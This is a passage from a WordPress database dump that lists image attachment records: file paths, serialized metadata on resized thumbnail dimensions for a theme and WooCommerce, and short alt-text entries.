ype\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"h6-img-5a-768x525.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:525;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:21:\"h6-img-5a-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:22:\"h6-img-5a-1200x650.jpg\";s:5:\"width\";i:1200;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:21:\"h6-img-5a-650x820.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:820;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h6-img-5a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"h6-img-5a-600x410.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h6-img-5a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"h6-img-5a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"h6-img-5a-600x410.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h6-img-5a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51537,4308,'_wp_attached_file','2018/08/h5-img-9.jpg'),(51538,4308,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:292;s:6:\"height\";i:624;s:4:\"file\";s:20:\"2018/08/h5-img-9.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h5-img-9-140x300.jpg\";s:5:\"width\";i:140;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-9-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h5-img-9-292x375.jpg\";s:5:\"width\";i:292;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-9-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"h5-img-9-292x375.jpg\";s:5:\"width\";i:292;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-9-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51539,4309,'_wp_attached_file','2018/08/h4-rev-img-1a.jpg'),(51540,4309,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1463;s:6:\"height\";i:844;s:4:\"file\";s:25:\"2018/08/h4-rev-img-1a.jpg\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"h4-rev-img-1a-300x173.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:173;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"h4-rev-img-1a-1024x591.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:591;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"h4-rev-img-1a-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"h4-rev-img-1a-768x443.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:443;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:25:\"h4-rev-img-1a-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:26:\"h4-rev-img-1a-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:25:\"h4-rev-img-1a-650x844.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:844;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"attika_mikado_image_huge\";a:4:{s:4:\"file\";s:26:\"h4-rev-img-1a-1300x844.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:844;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"h4-rev-img-1a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"h4-rev-img-1a-600x346.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:346;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"h4-rev-img-1a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"h4-rev-img-1a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"h4-rev-img-1a-600x346.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:346;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"h4-rev-img-1a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51541,522,'_wp_attachment_image_alt','s'),(51542,4308,'_wp_attachment_image_alt','m'),(51543,4305,'_wp_attachment_image_alt','m'),(51544,4307,'_wp_attachment_image_alt','d'),(51545,4309,'_wp_attachment_image_alt','m'),(51546,4310,'_wp_attached_file','2018/08/h5-img-11.jpg'),(51547,4310,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:210;s:6:\"height\";i:299;s:4:\"file\";s:21:\"2018/08/h5-img-11.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h5-img-11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h5-img-11-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h5-img-11-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51548,4310,'_wp_attachment_image_alt','m'),(51549,4311,'_wp_attached_file','2018/08/h7-port-img-4.jpg'),(51550,4311,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1100;s:4:\"file\";s:25:\"2018/08/h7-port-img-4.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"h7-port-img-4-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"h7-port-img-4-1024x587.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"h7-port-img-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"h7-port-img-4-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:26:\"h7-port-img-4-1536x880.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:25:\"h7-port-img-4-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:26:\"h7-port-img-4-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:26:\"h7-port-img-4-650x1100.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"attika_mikado_image_huge\";a:4:{s:4:\"file\";s:27:\"h7-port-img-4-1300x1100.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"h7-port-img-4-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"h7-port-img-4-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"h7-port-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"h7-port-img-4-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"h7-port-img-4-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"h7-port-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51551,4312,'_wp_attached_file','2018/08/h6-img-7a.jpg'),(51552,4312,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:820;s:4:\"file\";s:21:\"2018/08/h6-img-7a.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h6-img-7a-300x205.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"h6-img-7a-1024x700.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:700;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h6-img-7a-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"h6-img-7a-768x525.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:525;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:21:\"h6-img-7a-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:22:\"h6-img-7a-1200x650.jpg\";s:5:\"width\";i:1200;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:21:\"h6-img-7a-650x820.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:820;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h6-img-7a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"h6-img-7a-600x410.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h6-img-7a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"h6-img-7a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"h6-img-7a-600x410.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h6-img-7a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51553,1488,'_wp_attached_file','2018/08/h5-img-7a.png'),(51554,1488,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:340;s:6:\"height\";i:644;s:4:\"file\";s:21:\"2018/08/h5-img-7a.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h5-img-7a-158x300.png\";s:5:\"width\";i:158;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h5-img-7a-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h5-img-7a-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h5-img-7a-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"h5-img-7a-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h5-img-7a-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51555,4313,'_wp_attached_file','2018/08/h4-rev-img-1.jpg'),(51556,4313,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1438;s:6:\"height\";i:844;s:4:\"file\";s:24:\"2018/08/h4-rev-img-1.jpg\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"h4-rev-img-1-300x176.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:176;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"h4-rev-img-1-1024x601.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:601;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"h4-rev-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"h4-rev-img-1-768x451.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:24:\"h4-rev-img-1-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:25:\"h4-rev-img-1-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:24:\"h4-rev-img-1-650x844.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:844;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"attika_mikado_image_huge\";a:4:{s:4:\"file\";s:25:\"h4-rev-img-1-1300x844.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:844;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:24:\"h4-rev-img-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:24:\"h4-rev-img-1-600x352.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:352;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"h4-rev-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:24:\"h4-rev-img-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:24:\"h4-rev-img-1-600x352.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:352;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"h4-rev-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51557,4314,'_wp_attached_file','2018/08/h5-img-12.jpg'),(51558,4314,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:293;s:6:\"height\";i:457;s:4:\"file\";s:21:\"2018/08/h5-img-12.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h5-img-12-192x300.jpg\";s:5:\"width\";i:192;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h5-img-12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h5-img-12-293x375.jpg\";s:5:\"width\";i:293;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h5-img-12-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"h5-img-12-293x375.jpg\";s:5:\"width\";i:293;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h5-img-12-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51559,4314,'_wp_attachment_image_alt','m'),(51560,4312,'_wp_attachment_image_alt','d'),(51561,4315,'_wp_attached_file','2018/08/h5-img-13.png'),(51562,4315,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:370;s:6:\"height\";i:370;s:4:\"file\";s:21:\"2018/08/h5-img-13.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h5-img-13-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h5-img-13-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h5-img-13-300x370.png\";s:5:\"width\";i:300;s:6:\"height\";i:370;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h5-img-13-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"h5-img-13-300x370.png\";s:5:\"width\";i:300;s:6:\"height\";i:370;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h5-img-13-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51563,1488,'_wp_attachment_image_alt','m'),(51564,4311,'_wp_attachment_image_alt','m'),(51565,4313,'_wp_attachment_image_alt','m'),(51566,4315,'_wp_attachment_image_alt','m'),(51567,4316,'_wp_attached_file','2018/08/h6-img-8a.jpg'),(51568,4316,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:820;s:4:\"file\";s:21:\"2018/08/h6-img-8a.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h6-img-8a-300x205.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"h6-img-8a-1024x700.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:700;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h6-img-8a-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"h6-img-8a-768x525.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:525;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:21:\"h6-img-8a-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:22:\"h6-img-8a-1200x650.jpg\";s:5:\"width\";i:1200;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:21:\"h6-img-8a-650x820.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:820;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";